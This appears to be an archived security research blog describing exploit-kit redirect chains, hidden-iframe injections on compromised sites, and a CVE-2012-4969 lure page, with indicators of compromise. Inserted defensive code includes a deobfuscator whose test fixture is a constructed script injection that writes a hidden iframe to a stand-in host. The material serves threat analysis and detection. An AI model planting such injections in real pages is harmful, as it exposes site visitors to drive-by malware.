Wednesday, November 27, 2013

Health Care Sites Prime Targets for Scammers

A few weeks ago I wrote a blog about a spear-phishing campaign trying to capitalize on Americans desperate for information on the ever-changing healthcare laws. Today, I'll be reviewing another such attack. The threat in question does not appear to be downloading any malicious content at the time of publication, but I will show that the compromised site is still hosting obfuscated malicious JavaScript that redirects victims to third-party content before they view the site.

The site in question is hxxp://

Below is a screenshot of the obfuscated JS (JavaScript), redirecting the user's traffic to another site.

The precise path in question is highlighted in blue.
Once deobfuscated, we see that there is an injected hidden iFrame, which redirects the victim to a site previously registered in Ukraine. This would typically spell disaster, but luckily for victims, right now the site is returning a 404 Page Not Found error. A quick Google lookup will yield some information on other attempts at this attack.

Note the hidden iFrame
The conclusion we can come to is that health care is a hot topic. Users should practice better browsing habits, especially when the topic they are researching is primary subject matter for scammers! Mind your clicks.

Friday, October 11, 2013

Sweet Orange Dropping some Sweet Botnet action

I recently saw a very thorough blog on a new flavor of the Sweet Orange Exploit Kit and thought I might throw in some additional research I found. So let's start with what we know!

There are several hacked WordPress and Joomla sites that are clearly continuing to operate without the compromise being picked up by those administering the sites. One such example is seen in the screenshot below:

The first line is a hidden iframe taking you to Sweet Orange EK.
I've seen numerous other sites listed as referral URLs for this malicious activity, based on a search of transactions carried out on the IP listed in the same class C as mentioned in prior research (

The idea here is that the attackers take control of a legitimate site, redirect the user to their EK via a hidden iFrame, assess their Java version, and strike accordingly.  All of this is highly reproducible in the lab.

The malicious iFrame leads to your very own Sweet Orange EK!

I won't go into too much detail about the actual .jar file inspection since it was done so thoroughly here. I will say that it is checking for a Java version 1.7 or greater and that it is manipulating the system via CVE-2013-2460. The end result is a dropped executable on the victim's machine. This executable displays botnet activity by doing regularly scheduled POSTs back to a single IP in all instances run.

I did some Behavioral Analysis on the executable dropped this way and found that it is contacting an IP (

POST activity made
All URLs queried by a sample
Based on historical data of this threat in action in our lab, victims of this attack can be expected to contact this same address every 9 minutes. It achieves this by creating a file with administrative rights in the All Users directory in Windows.

The file name is randomly generated.
9 Minute intervals of phone home transactions
I hope this helps administrators or other researchers, who actively monitor for botnet activity related to this threat.
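One way to monitor for this 9-minute phone-home pattern in proxy logs, as an added example that is not part of the original post; the log format, hostnames and destination IP 203.0.113.10 are constructed.

```python
"""Flag hosts whose POSTs to one destination IP recur at a steady interval.
Added example, not from the original post: it turns the post's observation
(a dropped executable POSTing to a single IP every ~9 minutes) into a check
over proxy log lines. Log format, hostnames and 203.0.113.10 are constructed.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample log: "<timestamp> <client> <method> <dest_ip> <path>"
SAMPLE_LOG = """\
2013-10-11T09:00:00 ws-17 POST 203.0.113.10 /gate.php
2013-10-11T09:01:12 ws-17 GET 198.51.100.7 /index.html
2013-10-11T09:09:01 ws-17 POST 203.0.113.10 /gate.php
2013-10-11T09:17:59 ws-17 POST 203.0.113.10 /gate.php
2013-10-11T09:27:00 ws-17 POST 203.0.113.10 /gate.php
2013-10-11T09:03:30 ws-22 POST 198.51.100.7 /login
2013-10-11T09:40:10 ws-22 POST 198.51.100.7 /login
2013-10-11T10:55:00 ws-22 POST 198.51.100.7 /login
"""

def parse(log):
    """Yield (timestamp, client, method, dest_ip) for each log line."""
    for line in log.splitlines():
        ts, client, method, dest, _path = line.split()
        yield datetime.fromisoformat(ts), client, method, dest

def find_beacons(log, min_posts=4, max_jitter=0.1):
    """Return {(client, dest_ip): mean_gap_minutes} for (client, dest) pairs with
    at least min_posts POSTs whose gaps vary by at most max_jitter of the mean gap.
    """
    times = defaultdict(list)
    for ts, client, method, dest in parse(log):
        if method == "POST":
            times[(client, dest)].append(ts)
    beacons = {}
    for key, stamps in times.items():
        if len(stamps) < min_posts:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() / 60 for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons[key] = round(avg, 1)
    return beacons

if __name__ == "__main__":
    for (client, dest), minutes in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {dest}: POST every {minutes} min")  # ws-17 ... 9.0 min
```

Normal browsing (ws-22's irregular logins) fails the jitter test, so only the steady 9-minute POST cadence is reported.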

Friday, September 20, 2013

Blackhole Exploit Kit's (BEK) new variant!

A new BEK variant is spreading in the wild. The URL pattern observed this time is '/restores/path-matters.php'. While doing log analysis we found some live instances of BEK.

URLs found:

Redirection chain:
hxxp:// -> hxxp://
"" loads an iFrame into the browser, which on execution loads the EK URL.

iFrame Redirection to EK request,

EK Request,

On execution of the above JavaScript, it exploits the Java vulnerability and downloads malware onto the victim's machine.

Post EK execution,

VT Result:
JAR file : 8/48
EXE file:  32/48

For more info, read the following blogs:
Blackhole exploit kit v2 on the rise 
Analysis of a Blackhole Exploit page
Expack continues exploiting Java vulnerability

Stay away from BEK, Stay safe!


Saturday, October 20, 2012

Poortego: Intelligence for the 99%

The past few weeks I've had the pleasure of attending and presenting at SecTor and RSA Europe.  The topic of my presentation was on a project that I have been working on in my "spare" time - I call the project "Poortego" an intelligence tool for the 99%.  The code and presentation materials can be accessed here:

Warning: this project is in its infancy and is still in a state of initial development versus being a polished tool.

The premise of the project is that few tools fall into the niche of threat intelligence tooling, and many of those that do are quite expensive solutions (e.g., Palantir and Analyst Notebook). One outlier is Maltego, which is "affordable" but does have its limitations (particularly if you are using the Community Edition). Some limitations include that it is closed-source, out of the box relies on the Paterva servers (an issue for those with sensitive data), has limited export capability, and restricts inputs to transform operations (limited to a single entity). Note: Maltego is an excellent, mature tool in the intelligence space; the limitations that I listed are not meant to be a slight against the tool or the company.

Poortego is a completely free and open-source project written entirely in Ruby. It leverages ActiveRecord for flexible backend support and Rex::UI for the command-line interface, and can run as a stand-alone application or as a Metasploit plugin.
Poortego uses its own backend and framework for storage and data manipulation, with no reliance on other projects (e.g., Maltego or Metasploit). Poortego supports the notion of data transforms and the importing and exporting of data in different formats. The bulk of my development time thus far has been on the framework, so I have not spent a ton of time on transform and import/export plugins yet; only a few are present in the initial code base. Poortego currently has Graphviz export as its only visualization component. I've recently gotten turned on to neo4j and am investigating its usage for storage and visualization of intelligence. Much more to come!

In order to illustrate the value of intelligence and Poortego's usage from both attacker and defender perspectives, I presented some demonstrations.

The first demonstration (defender) came from analysis of an incident impacting one of Zscaler's customers. I observed some strange and unknown beaconing activity from a customer; there was not much information on the URL/domain, but I was able to tie the IP address of the server to other domains which were related to a malware sample in open-source intelligence:

Furthermore, taking the information on the malware sample and related domains, I was able to show that there was a relationship to a ThreatExpert report on 2008 targeted attacks against the Pentagon.

Note: all of the link graphs are Graphviz exports from Poortego.
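The pivot just described (unknown beacon, server IP, sibling domains, malware sample) as an added Python sketch of the entity/transform/Graphviz-export model Poortego implements. This is not Poortego's own (Ruby) code, and every lookup table in it is constructed stand-in data.

```python
"""Entity/link store with chained transforms and Graphviz DOT export.
Added example in Python, not Poortego's own (Ruby) code: it sketches the model
the post describes (entities, transforms that derive linked entities, DOT
export) using the defender demo as the scenario. All lookup data is constructed.
"""

class Graph:
    """Entities are (type, value) tuples; links are (src, label, dst) triples."""
    def __init__(self):
        self.links = set()

    def add(self, src, label, dst):
        self.links.add((src, label, dst))

    def entities(self):
        return {e for s, _, d in self.links for e in (s, d)}

    def run(self, transform, entity_type):
        """Apply transform to each entity of entity_type, storing the results."""
        for ent in sorted(e for e in self.entities() if e[0] == entity_type):
            for label, new in transform(ent):
                self.add(ent, label, new)

    def to_dot(self):
        """Render the link graph as Graphviz DOT (the export format the post uses)."""
        out = ["digraph intel {"]
        out += [f'  "{v}" [label="{t}\\n{v}"];' for t, v in sorted(self.entities())]
        out += [f'  "{s[1]}" -> "{d[1]}" [label="{l}"];' for s, l, d in sorted(self.links)]
        return "\n".join(out + ["}"])

# Constructed lookup tables standing in for DNS, passive DNS and sandbox data.
RESOLVES = {"beacon.example.net": "203.0.113.5"}
PDNS = {"203.0.113.5": ["beacon.example.net", "update.example.org"]}
SANDBOX = {"update.example.org": ["MD5_PLACEHOLDER"]}

def domain_to_ip(ent):      # transform: domain -> ip
    return [("resolves_to", ("ip", RESOLVES[ent[1]]))] if ent[1] in RESOLVES else []
def ip_to_domains(ent):     # transform: ip -> domains seen on it
    return [("hosts", ("domain", d)) for d in PDNS.get(ent[1], [])]
def domain_to_samples(ent): # transform: domain -> malware that contacted it
    return [("contacted_by", ("malware", h)) for h in SANDBOX.get(ent[1], [])]

def pivot_from_beacon(domain):
    """Defender demo: unknown beacon -> server IP -> sibling domains -> sample."""
    g = Graph()
    g.add(("host", "victim-ws"), "beacons_to", ("domain", domain))
    g.run(domain_to_ip, "domain")
    g.run(ip_to_domains, "ip")
    g.run(domain_to_samples, "domain")
    return g
```

`pivot_from_beacon("beacon.example.net").to_dot()` yields a DOT graph that can be rendered with `dot -Tpng`, the same way the link graphs above were produced.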

The attacker-perspective demonstration that I presented was to stage an attack against the RSA Europe conference using nothing more than intelligence. I wrote a transform for Poortego to retrieve, parse, and store presentation, speaker, moderator, panelist, and company relationships from the RSA EU Event Catalog. Obviously one could further exploit the knowledge of the relationships and do social networking enumeration, but I wanted to do something less obvious. The Event Catalog also included all of the presentations in PDF format, so I wrote another Poortego transform to retrieve the PDF files and run ExifTool on them to extract the author information and add an author relationship to the presentations. It was interesting to see the number of presentations that had a different author than speaker; there were two major outliers in this respect...

Unfortunately, I was just informed that there were some complaints regarding this particular demo; in order not to fuel the fire, I'm redacting this section of the post. There was no ill intent and all information used was OSINT. It goes to show the sensitivity in the security industry the moment potential offensive tactics are shown.

While I present a project/tool (Poortego), I also stress that it is not the tools that create the intelligence but the analysts/people. Tools can certainly help facilitate, though! Please reach out to me if you are interested in contributing to the project; there is still a lot of work to do to make this a well-polished tool.

Wednesday, September 19, 2012

A CVE-2012-4969 ("MS IE 0-Day") Seen In The Wild

Here is an example of a page that we have observed serving the CVE-2012-4969 exploit in the wild:

hxxp:// invitation [.] spacegas [.] com /Join-Id.html

The page itself appears to be a virtual meeting request (e.g., WebEx or JoinMe):

This is possibly a social engineering lure sent over email, as no HTTP referrer strings were observed in the transactions.

The source of the page includes a trailing iframe pointing to a page (join.html) directly on the same IP (

This join.html page serves the CVE-2012-4969 exploit code:

"Moh2010.swf" is a common filename seen related to this particular threat (just do a Google search for the file). The MD5 of the Flash file that we pulled down was 501cf420b5495874d6c795804ce21fd8, and it is also encrypted with the DoSWF encryptor.

Using the Anubis sandbox to run the exploit and the malware embedded in the Flash file, the following report was generated: here.

In the report we see a registry key created:
HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Internet Explorer\International\CpMRU

And a mutex set:

Further community analysis shows that someone uploaded the dropped malware to VirusTotal, which identifies it as a Delphi RAT (possibly a Hupigon variant); reported here.

Thursday, September 13, 2012

A Possible Fake Obama Page

I noticed this site being accessed this morning:

www [dot] obama2012 [dot] com

It certainly looks like a legit domain, but fell into that "uncategorized" bucket.

Currently when you visit the page, it redirects you to a Google search for "barak Obama"; notice the misspelling of "Barack" as well as the mixed upper and lower case in the name. Needless to say, this started looking suspect.

The domain was registered using Whois Privacy Protection and leverages name servers from FABULOUS.COM:

FABULOUS.COM provides a parking service for domains, though several seen in the past have had poor reputation, e.g., 

The site is currently resolving using a round-robin from Savvis:

Further analysis of the IPs in the round-robin shows open-source info reporting them to have been used in phishing and malware schemes in the past, though this is more of a reflection of past abuse on Savvis.

If/when this domain is un-parked and used, it will be interesting to see what type of content it serves. Furthermore, as the election grows near, it'll be interesting to track some of the malware and fraud schemes capitalizing on the event.

Thursday, August 16, 2012

Aggressive Activity on

I've noticed an increase in activity to resulting from JS inclusions on mass-compromised WordPress sites.  For example, the site "" has an included file on its main page ""

That contains a simple unescape / document.write JS script:

That includes content from a source on a site hosted on
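The hand deobfuscation described here and in the health care post above (an unescape()/document.write() wrapper that emits a hidden iframe) can be automated. This is an added example, not code from either post; the injected snippet and its hostnames are constructed.

```python
"""Decode an unescape()/document.write() injection and list hidden iframes.
Added example, not code from either post: it automates the hand deobfuscation
described for the health care site and for the WordPress inclusions. The
injected snippet below is constructed; hostnames are documentation placeholders.
"""
import re
from urllib.parse import unquote

# Constructed injected snippet in the style the posts describe.
INJECTED_JS = (
    'document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2F'
    'bad.example.net%2Fin.php%22%20width%3D%220%22%20height%3D%220%22'
    '%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E"));'
)
# Attribute fragments (whitespace removed, lower-cased) that hide an iframe.
HIDING_HINTS = ("display:none", "visibility:hidden", 'width="0"', 'height="0"',
                "width=0", "height=0")

def js_unescape(s):
    """Python equivalent of JavaScript unescape(): %uXXXX first, then %XX."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

def decode_unescape_writes(js):
    """Return the decoded string literal of each document.write(unescape(...))."""
    pattern = re.compile(r'document\.write\s*\(\s*unescape\s*\(\s*["\']([^"\']*)["\']', re.I)
    return [js_unescape(m) for m in pattern.findall(js)]

def find_iframes(html):
    """Return (src, hidden) for each <iframe>; hidden if zero-sized or styled away."""
    results = []
    for tag in re.findall(r"<iframe\b[^>]*>", html, re.I):
        src = re.search(r"""src\s*=\s*["']?([^"'\s>]+)""", tag, re.I)
        flat = re.sub(r"\s+", "", tag.lower())
        hidden = any(hint in flat for hint in HIDING_HINTS)
        results.append((src.group(1) if src else None, hidden))
    return results

def hidden_iframe_sources(js):
    """Decode every write in js and return the src of each hidden iframe."""
    return [src for chunk in decode_unescape_writes(js)
            for src, hidden in find_iframes(chunk) if hidden]

if __name__ == "__main__":
    print(hidden_iframe_sources(INJECTED_JS))  # ['http://bad.example.net/in.php']
```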

There are a number of domains involved in this campaign leveraging dynamic DNS providers. Domains such as:
Given the large number of domains seen (>80) - it is likely that there is domain generation and rotation logic being used in this campaign.

CleanMX has observed and listed a handful of involved domains here.
Unfortunately, my attempts thus far to replay transactions have resulted in 0-byte 200 responses or a redirect to another page with a 0-byte response (i.e., nothing useful). lists some of the sites involved as "Trojan.JS.Redirector.cq." Based on the logs that I've seen, it appears to be a redirector campaign to Blackhole; if/when I receive any related samples I will update this post.

In large part I have noticed that the IP address and domains are not in most block lists, so I wanted to make a note of this activity.